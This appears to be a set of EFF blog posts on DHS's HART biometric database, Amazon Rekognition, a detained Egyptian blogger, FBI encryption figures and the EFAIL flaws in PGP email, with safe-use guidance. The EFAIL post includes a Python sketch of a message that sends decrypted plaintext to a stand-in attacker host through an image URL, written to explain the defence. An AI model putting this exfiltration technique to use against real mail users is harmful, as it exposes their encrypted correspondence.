HART: Homeland Security’s Massive New Database Will Include Face Recognition, DNA, and People’s “Non-Obvious Relationships”

So why do we know so little about it?

The U.S. Department of Homeland Security (DHS) is quietly building what will likely become the largest database of biometric and biographic data on citizens and foreigners in the United States. The agency’s new Homeland Advanced Recognition Technology (HART) database will include multiple forms of biometrics—from face recognition to DNA—data from questionable sources, and highly personal data on innocent people. It will be shared with federal agencies outside of DHS as well as state and local law enforcement and foreign governments. And yet, we still know very little about it.

The records DHS plans to include in HART will chill and deter people from exercising their First Amendment protected rights to speak, assemble, and associate. Data like face recognition makes it possible to identify and track people in real time, including at lawful political protests and other gatherings. Other data DHS is planning to collect—including information about people’s “relationship patterns” and from officer “encounters” with the public—can be used to identify political affiliations, religious activities, and familial and friendly relationships. These data points are also frequently colored by conjecture and bias.

In late May, EFF filed comments criticizing DHS’s plans to collect, store, and share biometric and biographic records it receives from external agencies and to exempt this information from the federal Privacy Act. These newly-designated “External Biometric Records” (EBRs) will be integral to DHS’s bigger plans to build out HART. As we told the agency in our comments, DHS must do more to minimize the threats to privacy and civil liberties posed by this vast new trove of highly sensitive personal data.

DHS Biometrics Systems—From IDENT to HART

DHS slide showing growth of its legacy IDENT biometric database

DHS currently collects a lot of data. Its legacy IDENT fingerprint database contains information on 220 million unique individuals and processes 350,000 fingerprint transactions every day. That is a more than hundredfold increase from 20 years ago, when IDENT contained information on only 1.8 million people. Between IDENT and other DHS-managed databases, the agency manages over 10 billion biographic records and adds 10-15 million more each week.

DHS slide showing the breadth of DHS biometric and biographic data

DHS’s new HART database will allow the agency to vastly expand the types of records it can collect and store. HART will support at least seven types of biometric identifiers, including face and voice data, DNA, scars and tattoos, and a blanket category for “other modalities.” It will also include biographic information, like name, date of birth, physical descriptors, country of origin, and government ID numbers. And it will include data we know to be highly subjective, including information collected from officer “encounters” with the public and information about people’s “relationship patterns.”

DHS slide showing the planned expansion of its new HART biometric and biographic database

HART Will Impinge on First Amendment Rights

DHS plans to include records in HART that will chill speech and deter people from associating with others.

DHS’s face recognition roll-out is especially concerning. The agency uses mobile biometric devices that can identify faces and capture face data in the field, allowing its ICE (immigration) and CBP (customs) officers to scan everyone with whom they come into contact, whether or not those people are suspected of any criminal activity or an immigration violation. DHS is also partnering with airlines and other third parties to collect face images from travelers entering and leaving the U.S. When combined with data from other government agencies, these troubling collection practices will allow DHS to build a database large enough to identify and track all people in public places, without their knowledge—not just in places the agency oversees, like airports, but anywhere there are cameras.

Police abuse of face recognition technology is not a theoretical issue: it’s happening today. Law enforcement has already used face recognition on public streets and at political protests. During the protests surrounding the death of Freddie Gray in 2015, Baltimore Police ran social media photos against a face recognition database to identify protesters and arrest them. Recent Amazon promotional videos encourage police agencies to acquire the company’s “Rekognition” face recognition capabilities and use them with body cameras and smart cameras to track people throughout cities. At least two U.S. cities are already using Rekognition.

DHS compounds face recognition’s threat to anonymity and free speech by planning to include “records related to the analysis of relationship patterns among individuals.” We don’t know where DHS or its external partners will be getting these “relationship pattern” records, but they could come from social media profiles and posts, which the government plans to track by collecting social media user names from all foreign travelers entering the country.

Social media records, even if they are publicly available, can include highly personal and private information, and the fear that the government may be collecting and searching through this information may cause people to self-censor what they say online. The data collected also won’t be limited to information about foreign travelers—travelers’ social media records may include information on family members and friends who are U.S. citizens or lawful permanent residents, two groups protected explicitly by the Privacy Act. As the recent, repeated Facebook scandals are showing us, even when you think you have done everything you can to protect your own data, it could easily be disclosed without your control through the actions of your friends and contacts or Facebook itself.

DHS’s “relationship pattern” records will likely be misleading or inaccurate. DHS acknowledges that these records will include “non-obvious relationships.” However, if the relationships are “non-obvious,” one has to question whether they truly exist. Instead, DHS could be seeing connections among people that are based on nothing more than “liking” the same news article, using the same foreign words, or following the same organization on social media. This is highly problematic because records like these frequently inform officer decisions to stop, search, and arrest people.
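To see how easily this kind of link analysis can manufacture spurious connections, consider a toy sketch. Everything here is hypothetical (made-up names and data, and nothing known about DHS’s actual methods); it only illustrates the failure mode described above, where sharing one trivial interaction becomes a recorded “relationship”:

```python
# Toy illustration of "non-obvious relationship" inference via co-occurrence.
# Hypothetical data and logic; real systems are more complex, but the failure
# mode is the same: shared trivia becomes a recorded "relationship."
from itertools import combinations

# Each person's observed interactions (e.g., articles liked, accounts followed).
interactions = {
    "alice": {"news_article_42", "soccer_club"},
    "bob":   {"news_article_42", "cooking_forum"},
    "carol": {"gardening_blog"},
}

def inferred_relationships(data):
    """Link any two people who share at least one interaction."""
    links = set()
    for a, b in combinations(sorted(data), 2):
        if data[a] & data[b]:  # any overlap at all creates a "relationship"
            links.add((a, b))
    return links

print(inferred_relationships(interactions))
# alice and bob are now "related" solely because both liked article 42.
```

A record generated this way looks authoritative in a database, but it encodes nothing more than a coincidence.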

DHS plans to include additional records in HART that could be based on or impact First Amendment protected speech and activity. Records will include “miscellaneous officer comment information” and “encounter data.” These types of information come from police interactions with civilians, and are often collected under extremely questionable legal circumstances. For example, ICE officers use mobile devices to collect biometric and biographic data from people they “encounter” in the field, including via unauthorized entry into people’s homes and Bible study groups, and in public places where people congregate with other members of their community, such as on soccer fields, in community centers, and on buses. “Encounters” like these, whether they are conducted by ICE or by state or local police, are frequently not based on individualized suspicion that a civilian has done anything wrong, but that doesn’t prevent the officer from stockpiling any information obtained from the civilian during the encounter.

Finally, DHS relies on data from gang databases (its own and those from states), which often contain unsubstantiated data concerning people’s status and associations and are notoriously inaccurate. DHS has even fabricated gang status as an excuse to deport people.

HART Will Include Inaccurate Data and Will Share that Data with Other Agencies

DHS is not taking necessary steps with its new HART database to determine whether its own data and the data collected from its external partners are sufficiently accurate to prevent innocent people from being identified as criminal suspects, immigration law violators, or terrorists.

DHS has stated that it intends to rely on face recognition to identify data subjects across a variety of its mission areas, and “face matching” is one of the first components of the HART database to be built out. However, face recognition is frequently an inaccurate and unreliable biometric identifier. DHS’s tests of its own systems found significant levels of inaccuracy—the systems falsely rejected as many as 1 in 25 travelers. As a Georgetown report recently noted, “DHS’ error-prone face scanning system could cause 1,632 passengers to be wrongfully delayed or denied boarding every day at New York’s John F. Kennedy (JFK) International Airport alone.”
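The scale of that error rate is easy to check with back-of-the-envelope arithmetic. Note that the daily traveler count below is inferred from the report’s figures rather than an official JFK statistic:

```python
# Back-of-the-envelope check on the Georgetown figure. The daily traveler
# count is an assumption inferred from the report's numbers, not an official
# JFK statistic.
false_rejection_rate = 1 / 25   # DHS tests: up to 1 in 25 travelers falsely rejected
daily_travelers = 40_800        # assumed daily scanned international travelers at JFK

wrongly_flagged = daily_travelers * false_rejection_rate
print(int(wrongly_flagged))  # 1632
```

Even a rate that sounds small (4%) produces over sixteen hundred wrongly flagged people per day at a single airport.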

DHS’s external partners are also employing face recognition systems with high rates of inaccuracy. For example, the FBI has admitted that its Next Generation Identification database “may not be sufficiently reliable to accurately locate other photos of the same identity, resulting in an increased percentage of misidentifications.” Potential foreign partners such as police departments in the United Kingdom use face recognition systems with false positive rates as high as 98%—meaning that for every 100 people flagged as suspects, 98 in fact were not suspects.
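Numbers like these are a consequence of the base-rate problem: when a system scans huge crowds containing very few genuine suspects, even a modest error rate means most matches are wrong. A sketch with illustrative numbers (not taken from any specific deployment):

```python
# Why crowd scanning produces mostly false matches even with an
# accurate-sounding system: the base-rate problem. All numbers below are
# illustrative, not from any specific deployment.
crowd_size = 10_000        # people scanned
true_suspects = 1          # actual watchlist matches present in the crowd
false_match_rate = 0.01    # just 1% of innocent people falsely matched

false_matches = (crowd_size - true_suspects) * false_match_rate  # ~100 people
total_matches = false_matches + true_suspects
share_wrong = false_matches / total_matches

print(f"{share_wrong:.0%} of matches are innocent people")  # ~99%
```

A "99% accurate" system can still generate match lists that are ~99% innocent people, which is consistent with the real-world figures reported from UK deployments.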

DHS slide showing partner agencies

People of color and immigrants will shoulder much more of the burden of these misidentifications. For example, people of color are disproportionately represented in criminal and immigration databases, due to the unfair legacy of discrimination in our criminal justice and immigration systems. Moreover, FBI and MIT research has shown that current face recognition systems misidentify people of color and women at higher rates than whites and men, and the number of mistaken IDs increases for people with darker skin tones. False positives represent real people who may erroneously become suspects in a law enforcement or immigration investigation. This is true even if a face recognition system offers several results for a search instead of one; each of the people identified could be detained or brought in for questioning, even if there is nothing else linking them to a crime or violation.

In addition to accuracy problems inherent in face recognition, DHS’s own immigration data has also been shown to be unacceptably inaccurate. A 2005 Migration Policy Institute study analyzing records obtained through FOIA found “42% of NCIC immigration hits in response to police queries were ‘false positives’ where DHS was unable to confirm that the individual was an actual immigration violator.” A 2011 study of DHS’s Secure Communities program found approximately 3,600 United States citizens were improperly caught up in the program due to incorrect immigration records. As these inaccurate records are propagated throughout DHS’s partner agencies’ systems, it will become impossible to determine the source of the inaccuracy and correct the data.

HART Is Fatally Flawed and Must Be Stopped

DHS’s plans for future data collection and use should make us all very worried. For example, despite pushback from EFF, Georgetown, ACLU, and others, DHS believes it’s legally authorized to collect and retain face data from millions of U.S. citizens traveling internationally. However, as Georgetown’s Center on Privacy and Technology notes, Congress has never authorized face scans of American citizens.

Despite this, DHS plans to roll out its face recognition program to every international flight in the country within the next four years. DHS has stated “the only way for an individual to ensure he or she is not subject to collection of biometric information when traveling internationally is to refrain from traveling.”

This is just the tip of the iceberg. CBP Commissioner Kevin McAleenan has stated CBP wants to be able to use biometrics to “confirm the identity of travelers at any point in their travel,” not just at entry to or exit from the United States. This includes creating a “biometric pathway” to track all travelers through airports, from check-in, through security, into airport lounges and shops, and onto flights. Given CBP’s recent partnerships with airlines and plans to collect social media credentials, this could also mean CBP plans to track travelers from the moment they begin their internet travel research. Several Congress members have introduced legislation to legitimize some of these plans.

Congress has expressed concerns with DHS’s biometric programs. Senators Edward Markey and Mike Lee, in a recent letter addressed to the agency, stated, “[w]e are concerned that the use of the program on U.S. citizens remains facially unauthorized[.] . . . We request that DHS stop the expansion of this program and provide Congress with its explicit statutory authority to use and expand a biometric exit program on U.S. citizens.” The senators have urged DHS to propose a rulemaking to clarify its plans for biometric exit. Congress also withheld funds last year from DHS’s Office of Biometric Identity Management.

DHS’s Inspector General criticized the agency last year for failure to properly train its personnel on how biometric systems worked and noted that the agency’s reliance on third parties to verify travelers leaving the country “occasionally provided false departure or arrival status on visitors.” The OIG is again investigating the biometric exit program this year and plans to “assess whether biometric data collected at pilot locations has improved DHS's ability to verify departures.” The Government Accountability Office has also looked into the agency’s programs, criticizing the reliability of DHS’s data and the agency’s failure to evaluate whether a program that collects biometrics from all travelers leaving the country was even feasible.

However, these actions are not enough. DHS needs to end its plans to use its HART database to collect even more biometric and biographic information about U.S. citizens and foreigners. This system poses a very real threat to First Amendment-protected activities. Further, DHS has a well-documented history of poor data management, and face recognition has a high rate of misidentifications. Congress must step in with more oversight and act now to put the brakes on DHS’s broad expansion of data collection.

Related Cases: FBI's Next Generation Identification Biometrics Database

How To Turn PGP Back On As Safely As Possible

Previously, EFF recommended to PGP users that, because of new attacks revealed by researchers from Münster University of Applied Sciences, Ruhr University Bochum, and NXP Semiconductors, they should disable the PGP plugins in their email clients for now. You can read more detailed rationale for this advice in our FAQ on the topic, but undoubtedly the most frequently asked question has been: how long is for now? When will it be safe to use PGP for email again?

The TL;DR (although you really should read the rest of this article): coders and researchers across the PGP email ecosystem have been hard at work addressing the problems highlighted by the paper—and after their sterling efforts, we believe some parts are now safe for use, with sufficient precautions.

If you use PGP for email with Thunderbird and Enigmail, you can update to Thunderbird 52.8 and Enigmail 2.0.6 (or later), turn on “View as Plain Text” (see below), re-enable Enigmail, and get back to using PGP in email.

For other popular clients: the answer is hazier. If you use GPGTools and Apple Mail, you should still wait. That system is still vulnerable, as this video from First Look’s Micah Lee shows.




Other email clients have specific weaknesses reported in the EFAIL paper that may or may not have since been patched. Even where a patch exists, depending on how it was implemented, the client may still be vulnerable to other exploits in the class of vulnerabilities described in the paper. So be careful out there: keep your software regularly updated, and choose conservative privacy settings for the client you use to decrypt and encrypt PGP mail. In particular, we continue to recommend against using PGP with email clients that display HTML mail. If possible, turn off that feature—and if you can’t, consider decrypting and encrypting messages using an external, dedicated application.

And remember, the safety of your messages also depends on the security of your correspondents, so encourage them to use clients that are safe from EFAIL too. Consider asking them to confirm which client and plugin versions they’re running before you resume sensitive correspondence.

The Fixes in Detail

The researchers’ publication contains a proof-of-concept exploit that affected users who protect their communications with PGP. The exploit allowed an attacker to use the victim’s own email client to decrypt previously acquired messages (or other protected information) and return the decrypted content to the attacker without alerting the victim. The attacker needed access to the previous (still encrypted) text. Unfortunately, an attacker that has access to your old encrypted emails is exactly the serious threat that the most targeted populations use PGP to protect against.

The attack, once understood, is simple to deploy. However, despite the fact that the vulnerability had been disclosed to the relevant developers months ago, many of the most popular ways of using PGP and email had no protection against the attack at the time of the paper’s publication. Because so many people in extremely vulnerable roles—such as journalists, human rights defenders, and dissidents—expect PGP to protect them against this kind of attack, we warned PGP users to hold off using it for secure communications and disable PGP plugins in their email clients until these problems were fixed.

That advice prompted a lot of discussion: some approving, some less so. We’re talking to everybody we can in the PGP community to hear about their experiences, and we hope to publish the deeper lessons we, and others, have learned from EFAIL and how it was handled.

But for now, we’ve been concentrating on testing whether the exploit has been successfully patched in the software setups most used by vulnerable groups.

Turning Off HTML vs Disabling Remote Content Loading

Many experts, after reading the research paper, were surprised we recommended disabling PGP in email, when it seemed like some less drastic options (such as turning off remote resource loading, and/or turning off their email client’s ability to read and decrypt HTML mail) would have sufficed to fend off the most obvious EFAIL attack.

But upon closer reading of the text of the paper, it becomes clear that the researchers describe exactly how to circumvent mail clients' attempts to block the remote loading of resources. Other researchers have created, and continue to create, exploits that can defeat this supposed protection. Further, with remote content turned off, a button is usually present to load remote content by choice. An alternative label for that innocuous-seeming button would be, “Leak all of my past encrypted emails to an attacker.” Having that button available to users is giving them an opportunity to shoot themselves in the foot.
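The most direct variant of the attack shows why remote-content blocking is such a weak defense. The attacker sandwiches previously captured ciphertext between two HTML fragments; when a vulnerable client decrypts the middle part and renders all three parts as one HTML document, the plaintext is spliced into an image URL and sent to the attacker’s server. A simplified structural sketch (no real ciphertext or network activity, and the attacker domain is made up):

```python
# Simplified sketch of EFAIL-style "direct exfiltration" message structure.
# This only builds the multipart message to show its shape; nothing is
# decrypted or sent anywhere. The attacker domain is hypothetical.
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

msg = MIMEMultipart()
# Part 1: opens an <img> tag whose URL points at the attacker's server.
msg.attach(MIMEText('<img src="http://attacker.example/collect?d=', "html"))
# Part 2: the stolen ciphertext, which the victim's client decrypts in place.
msg.attach(MIMEText("-----BEGIN PGP MESSAGE----- ... (captured ciphertext)",
                    "plain"))
# Part 3: closes the tag, completing the URL.
msg.attach(MIMEText('">', "html"))

# A vulnerable client renders the three parts as one HTML document, so the
# decrypted plaintext becomes part of the image URL it tries to fetch.
print(len(msg.get_payload()))  # 3 parts
```

Blocking remote content only helps until the user clicks “load remote content,” at which point the exfiltration request fires anyway.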

Then there’s the other option for protection: turning off HTML in mail clients. At the time, the researchers were not confident that this protection was sufficient: they had already discovered a way of defeating S/MIME, a comparable email encryption standard, with HTML mail turned off. And while their simplest example used HTML to steal data, they also spelled out hypothetical attacks that might not need it.

Turning off HTML mail appears to be holding up as a defense. Unfortunately, not every client has this as an option: you can consistently turn off HTML in Thunderbird, but not in Apple Mail.

So, our first recommendation: whatever client you use, turn off HTML email. We have instructions for this in Thunderbird below.

Thunderbird+Enigmail Users Can Turn PGP Back On

Thunderbird and Enigmail’s developers have been working on ways to protect against the EFAIL vulnerabilities. As of version 2.0.6 (released Sunday, May 27), Enigmail has released patches that defend against all known exploits described in the EFAIL paper, along with some new ones in the same class that other researchers were able to devise, which beat earlier Enigmail fixes. Each new fix made it a little harder for an attacker to get through Enigmail’s defenses. We feel confident that, if you update to this version of Enigmail (and keep updating!), you can turn PGP back on in Thunderbird.

But, while Enigmail now defends against most known attacks even with HTML on, the EFAIL vulnerability demonstrated just how dangerous HTML in email is for security. Thus, we recommend that Enigmail users also turn off HTML by going to View > Message Body As > Plain Text.

1. First click on the Thunderbird hamburger menu (the three horizontal lines).

Screenshot showing the Thunderbird hamburger menu selected

2. Select “View” from the right side of the menu that appears.

Screenshot showing the "View" option selected

3. Select “Message Body As” from the menu that appears, then select the “Plain Text” radio option.

Screenshot showing the "Message Body As" then "Plain Text" options selected

Viewing all email in plaintext can be hard, and not just because many services send only HTML emails. Turning off HTML mail can pose some usability problems, such as some attachments failing to show up. Thunderbird users shouldn't have to make this trade-off between usability and security, so we hope that Thunderbird will take a closer look at supporting their plaintext community from now on. As the software is now, however, users will need to decide for themselves whether to take the risk of using HTML mail; the most vulnerable users should probably not take that risk, but the right choice for your community is a judgment call based on your situation.
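For reference, the same setting can also be made via Thunderbird’s Config Editor or a user.js file. The preference names below are from Thunderbird 52-era documentation; verify them against your version before relying on them:

```javascript
// user.js / Config Editor entries approximating View > Message Body As > Plain Text.
// Preference names are from Thunderbird 52-era documentation; check your version.
user_pref("mailnews.display.html_as", 1);             // render HTML mail as plain text
user_pref("mailnews.display.prefer_plaintext", true); // prefer a text/plain part when present
```

Setting these in user.js makes the choice persistent across profiles you manage, rather than relying on each user remembering the menu toggle.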

Apple Mail+GPGTools Users Should Keep PGP Disabled For Now

Since Apple Mail doesn’t provide a supported plugin interface, the GPGTools developers have faced a difficult challenge in updating GPGTools to defend against EFAIL. Additionally, Apple Mail has no option for users to view all emails without HTML (also called plaintext-only). Apple Mail only provides an option to disable remote content loading, which does not defend against existing attacks.

Despite the challenges with Apple Mail, the GPGTools developers are working hard on fixes for all reported EFAIL-related attacks, and a release is expected very soon. That said, we do not recommend re-enabling GPGMail with Apple Mail yet.

Other Clients

The EFAIL researchers did a great job reviewing and finding problems with a wide set of desktop email clients. Using one of the lesser-known clients may or may not leave you vulnerable to the specific vulnerabilities outlined in the paper. And depending on the way the patches work, the patches may or may not protect against problems discovered by future research into the same class of problems.

Our advice for all PGP email users remains the same: if you depend on your email client to decipher PGP messages, make sure it doesn’t decode HTML mail, and check with its creators to see whether they’ve been working on protecting against EFAIL.

The Future of Pretty Good Privacy

Unlike situations where a fix only requires one piece of software to be mended and upgraded, some of the EFAIL problems come from interaction between all the different pieces of using PGP with email: email clients like Thunderbird, PGP plugins like Enigmail, and PGP implementations like GnuPG.

There are lots of moving parts to be fixed, and some of the fixes involve changes to the very core of how they function. It’s not surprising that it takes time to coordinate against attacks that exploit the complex interconnections between all of these parts.

EFF has fought, in the courts and in the corridors of power, for the right to write, export, and use decentralized and open source encryption tools, for as long as PGP has existed. We’re under no illusion about how hard this work is, or how underappreciated and underfunded it can be, or how vital its results are, especially for those targeted by the most powerful and determined of attackers. The transparent and public cooperation of all the parts of the PGP system make for some hard conversations sometimes, but that’s what keeps it honest and accountable—and that’s what keeps us all safe.

But if we’re to continue to use and recommend PGP for the cases where it is most appropriate—protecting the most vulnerable and targeted of Internet users—we need to carry on that conversation. We need to cooperate to radically improve the secure email experience, to learn from what we know about modern cryptography and usability, and to decide what true 21st-century secure email must look like.

It’s time to upgrade not just your PGP email client, but also the entire secure email ecosystem, so that it’s usable, universal, and stable.

Amazon, Stop Powering Government Surveillance

EFF has joined the ACLU and a coalition of civil liberties organizations demanding that Amazon stop powering a government surveillance infrastructure. Last week, we signed onto a letter to Amazon condemning the company for developing a new face recognition product that enables real-time government surveillance through police body cameras and the smart cameras blanketing many cities. Amazon has been heavily marketing this tool—called “Rekognition”—to law enforcement, and it’s already being used by agencies in Florida and Oregon. This system affords the government vast and dangerous surveillance powers, and it poses a threat to the privacy and freedom of communities across the country. That includes many of Amazon’s own customers, who represent more than 75 percent of U.S. online consumers.

As the joint letter to Amazon CEO Jeff Bezos explains, Amazon’s face recognition technology is “readily available to violate rights and target communities of color.” And as we’ve discussed extensively before, face recognition technology like this allows the government to amp up surveillance in already over-policed communities of color, continuously track immigrants, and identify and arrest protesters and activists. This technology will not only invade our privacy and unfairly burden minority and immigrant communities, but it will also chill our free speech.

Amazon should stand up for civil liberties, including those of its own customers, and get out of the surveillance business.

Since the ACLU sounded the alarm, others have started to push back on Amazon. The Congressional Black Caucus wrote a separate letter to Bezos last week, stating, “We are troubled by the profound negative unintended consequences this form of artificial intelligence could have for African Americans, undocumented immigrants, and protesters.” The CBC pointed out the “race-based ‘blind spots’ in artificial intelligence” that result in higher numbers of misidentifications for African Americans and women than for whites and men, and called on Amazon to hire more lawyers, engineers, and data scientists of color. Two other members of Congress followed up with another letter on Friday.

Amazon’s partnership with law enforcement isn’t new. Amazon already works with agencies across the country, offering cloud storage services through Amazon Web Services (AWS) that allow agencies to store the extremely large video files generated by body and other surveillance cameras. Rekognition is an inexpensive add-on to AWS, costing agencies approximately $6-$12 per month.

Rekognition doesn’t just identify faces. It can also track people through a scene, even if their faces aren’t visible. It can identify and catalog a person’s gender, what they’re doing, what they’re wearing, and whether they’re happy or sad. It can identify other things in a scene, like dogs, cars, or trees, and can recognize text, including street signs and license plates. It also offers to flag things it considers “unsafe” or “inappropriate.”

And the technology is powerful, if Amazon’s marketing materials are accurate. According to the company, Rekognition can identify people in real-time by instantaneously searching databases containing tens of millions of faces, detect up to 100 people in “challenging crowded” images, and track people through video—within a single shot and across multiple shots, and even when the camera is in motion—which makes “investigation and monitoring of individuals easy and accurate” for “security and surveillance applications.” Amazon has even advertised Rekognition for use on police officer “bodycams.” (The company took mention of bodycams off its website after the ACLU voiced concern, but “[t]hat appears to be the extent of its response[.]”)
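To make concrete how accessible these capabilities are, here is a sketch of the kind of per-face attribute data the Rekognition DetectFaces API returns, per AWS’s public documentation. The actual API call requires AWS credentials, so it is shown commented out; the sample response uses made-up values (real field names, hypothetical numbers) trimmed to the attributes discussed above:

```python
# Sketch of Rekognition's DetectFaces attribute output. The boto3 call is
# commented out because it needs AWS credentials; the sample response below
# uses hypothetical values with the real response field names.

# import boto3
# client = boto3.client("rekognition")
# response = client.detect_faces(Image={"Bytes": image_bytes},
#                                Attributes=["ALL"])

sample_response = {  # hypothetical values, real field names
    "FaceDetails": [{
        "Gender": {"Value": "Female", "Confidence": 99.1},
        "Emotions": [
            {"Type": "HAPPY", "Confidence": 87.4},
            {"Type": "SAD", "Confidence": 3.2},
        ],
    }]
}

def summarize(face):
    """Pull out the gender guess and highest-confidence emotion for one face."""
    top_emotion = max(face["Emotions"], key=lambda e: e["Confidence"])
    return face["Gender"]["Value"], top_emotion["Type"]

print(summarize(sample_response["FaceDetails"][0]))  # ('Female', 'HAPPY')
```

A few lines of code against a cheap cloud API is all it takes to turn any camera feed into a demographic and emotional profiling tool, which is exactly why oversight of police acquisition matters.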

This is an example of what can go wrong when police departments unilaterally decide what privacy invasions are in the public interest, without any public oversight or input. That’s why EFF supports Community Control Over Police Surveillance (CCOPS) measures, which ensure that local police can't do deals with surveillance technology companies without going through local city councils and the public. People deserve a say in what types of surveillance technology police use in their communities, and what policies and safeguards the police follow. Further, governments must make more balanced, accountable decisions about surveillance when communities and elected officials are involved in the decision-making process.

Amazon responded to the uproar surrounding the announcement of its government surveillance work by defending the usefulness of the program, noting that it has been used to find lost children in amusement parks and to identify faces in the crowd at the royal wedding. But it failed to grapple with the bigger issue: as one journalist put it, “Nobody is forcing these companies to supply more sensitive image-recognition technology to those who might use it in violation of human or civil rights.”

Amazon should stand up for civil liberties, including those of its own customers, and get out of the surveillance business. It should cut law enforcement off from using its face recognition technology, not help usher in a surveillance state. And communities across the country should demand baseline measures to stop law enforcement from acquiring and using powerful new surveillance systems without any public oversight or accountability in the future.


Egyptian Blogger and Activist Wael Abbas Detained

When we wrote of award-winning journalist Wael Abbas being silenced by social media platforms in February, we never suspected that those suspensions would reach beyond the internet to help silence him in real life. But, following Abbas's detention on Wednesday by police in Cairo, we now fear that decisions—and lack of transparency—made by Silicon Valley companies will help Egyptian authorities in their crackdown on journalists and human rights activists.

Abbas was taken at dawn on May 23 by police to an undisclosed location, according to news reports which quote his lawyer, Gamal Eid. The Arabic Network for Human Rights Information (ANHRI) reported that Abbas was not shown a warrant or given a reason for his arrest. He appeared in front of state security yesterday and was questioned and ordered by prosecutors to be held for fifteen days. According to the Association for Freedom of Thought and Expression (AFTE), Abbas was charged with “involvement in a terrorist group”, “spreading false news” and “misuse of social networks.”

As we detailed previously, Abbas is known for his work exposing police brutality and other abuses by Egyptian authorities, and as such, he's faced backlash from the state before. He was convicted in 2010 on charges of "providing telecommunications service to the public without permission from authorities" after publishing a series of blog posts in which he accused the Egyptian government of human rights abuses.

Twitter does not comment publicly on individual accounts, but in December, Abbas claimed in a Facebook post that Twitter had not provided him with a reason for his suspension. Now, at least one local media outlet is reporting that Abbas's Twitter account—which was suspended in December 2017—was taken down due to incitement to violence.

It seems clear that the messaging around Abbas' detention is that his arrest was connected to his posts on Facebook and Twitter, and that the prosecution and media are using his suspension by these services as part of the evidence for his guilt.

In the medium term, this is yet another reason why we need more transparency and clarity in social media takedowns. Without transparency, these acts of private censorship are already effectively a hidden court, with little due process. These decisions are being used as evidence by media campaigns against activists, by real-world courts (some, like the "media committees" that judged Abbas, with little due process of their own) — and with real consequences.

In the short term, however, the far more important step is for the Egyptian state to immediately drop these ridiculous charges and release Wael Abbas, an independent journalist, restoring his freedom and the freedom of the online Egyptian press. We call on Egypt to Free Wael Abbas.


FBI Admits It Inflated Number of Supposedly Unhackable Devices

We’ve learned that the FBI has been misinforming Congress and the public as part of its call for backdoor access to encrypted devices. For months, the Bureau has claimed that encryption prevented it from legally searching the contents of nearly 7,800 devices in 2017, but today the Washington Post reports that the actual number is far lower due to "programming errors" by the FBI.

Frankly, we’re not surprised. FBI Director Christopher Wray and others argue that law enforcement needs some sort of backdoor “exceptional access” in order to deal with the increased adoption of encryption, particularly on mobile devices. And the 7,775 supposedly unhackable phones encountered by the FBI in 2017 have been central to Wray’s claim that their investigations are “Going Dark.” But the scope of this problem is called into doubt by services offered by third-party vendors like Cellebrite and Grayshift, which can reportedly bypass encryption on even the newest phones. The Bureau’s credibility on this issue was also undercut by a recent DOJ Office of the Inspector General report, which found that internal failures of communication caused the government to make false statements about its need for Apple to assist in unlocking a seized iPhone as part of the San Bernardino case.

Given the availability of these third-party solutions, we’ve questioned how and why the FBI finds itself thwarted by so many locked phones. That’s why last week, EFF submitted a FOIA request for records related to Wray’s talking points about the 7,800 unhackable phones and the FBI’s use of outside vendors to bypass encryption.

The stakes here are high. Imposing an exceptional access mandate on encryption providers would be extraordinarily dangerous from a security perspective, but the government has never provided details about the scope of the supposed Going Dark problem. The latest revision to Director Wray’s favorite talking point demonstrates that the case for legislation is even weaker than we thought. We hope that the government is suitably forthcoming to our FOIA request so that we can get to the bottom of this issue.

Related Cases: Apple Challenges FBI: All Writs Act Order (CA)

Pretty Good Procedures for Protecting Your Email

A group of researchers recently released a paper that describes a new class of serious vulnerabilities in the popular encryption standard PGP (including GPG) as implemented in email clients. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email. See EFF’s analysis and FAQ for more detail.

Our current recommendation is to disable PGP integration in email clients. This is the number one thing you can do to protect your past messages, and prevent future messages that you receive from being read by an attacker. You should also encourage your contacts to do the same.

If you have old emails you need to access, the next thing you can do is save old emails to be decrypted on the command line.

Methods for reading encrypted email on the command line vary between operating systems, so separate instructions are needed. The instructions linked above for disabling the plugin from your mail client leave your PGP keyring in place, so you will use the same passphrase when prompted.

Using the Command Line to Decrypt a Message on Linux

If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL.

Note that the first two steps (opening the terminal) will vary between desktop environments.

1. Open the Activities view by clicking all the way in the top left corner of your screen.

2. Type “terminal” into the search bar, and press Enter. This will open the command prompt.

3. Type “cd Desktop” to go to your desktop. Mind the capital ‘D’!

4. Type “gpg -d encrypted.eml” using the name of the file you saved earlier. This may prompt you for your PGP passphrase depending on your configuration and recent usage, and will output the full email in the terminal window.

These notes are based on Ubuntu Desktop with GNOME 3.
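If you want to try the flow above end-to-end before touching real mail, the sketch below creates a throwaway encrypted file with a symmetric passphrase (`-c`) so it runs without your keyring. With your real saved emails, which are encrypted to your key, step 4's plain `gpg -d encrypted.eml` will prompt for your own passphrase instead; the `--batch`, `--pinentry-mode loopback`, and `--passphrase` flags here exist only to keep the demo self-contained (GnuPG 2.1 or later assumed).

```shell
# Self-contained sketch of step 4: make a throwaway encrypted file,
# then decrypt it with gpg -d as described above.
cd "$(mktemp -d)"
echo "hello from an encrypted email" > src.txt
gpg --batch --yes --pinentry-mode loopback --passphrase demo \
    -c -o encrypted.eml src.txt
gpg --batch --pinentry-mode loopback --passphrase demo -d encrypted.eml
# the decrypted text appears in the terminal window
```

Decrypting in the terminal, rather than in a mail client, keeps the plaintext away from any HTML parser, which is the exfiltration channel the EFAIL attacks rely on.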


PGP and EFAIL: Frequently Asked Questions

Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email, and theorized many more which others could build upon. For users who have few—or even no—alternatives for end-to-end encryption, news of these vulnerabilities may leave many questions unanswered.

Digital security trainers, whistleblowers, journalists, activists, cryptographers, industry, and nonprofit organizations have relied on PGP for 27 years as a way to protect email communications from eavesdroppers and ensure the authenticity of messages. If you’re like us, you likely have recommended PGP as an end-to-end encrypted email solution in workshops, trainings, guides, cryptoparties, and keysigning parties. It can be hard to imagine a workflow without PGP once you’ve taken the time to learn it and incorporate it in your communications.

We’ve attempted to answer some important questions about the current state of PGP email security below.

Who is affected, and why should I care?

